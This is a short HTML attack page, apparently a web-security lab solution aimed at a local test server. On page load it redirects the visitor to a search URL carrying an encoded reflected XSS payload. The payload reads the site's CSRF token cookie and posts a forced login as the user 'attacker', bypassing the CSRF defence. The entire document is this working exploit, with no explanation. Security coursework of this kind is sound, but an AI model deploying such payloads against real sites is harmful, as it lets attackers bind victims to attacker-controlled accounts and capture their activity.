
		<html>
            <script type ='text/javascript'>
            document.addEventListener("DOMContentLoaded", function(){url = "http://127.0.0.5:8080/search?q=%3Cscript%3E+document.addEventListener%28%22DOMContentLoaded%22%2C+function+%28%29%7B+var+token+%3D+Cookies.get%28%22csrf_token%22%29%3B+%24.post%28%22http%3A%2F%2F127.0.0.5%3A8080%2Flogin%3Fcsrfdefense%3D1%26xssdefense%3D0+%22%2C+%7Busername%3A+%22attacker%22%2C+password%3A+%22URpwn3d%22%2C+csrf_token%3A+token%7D%29%3B%7D%29%3B+%3C%2Fscript%3E";
            window.location.href=url; },false);
            </script>
            <meta http-equiv="refresh" content="1">
            <meta http-equiv="refresh" content="1">
            <body>
            </body>
		</html>
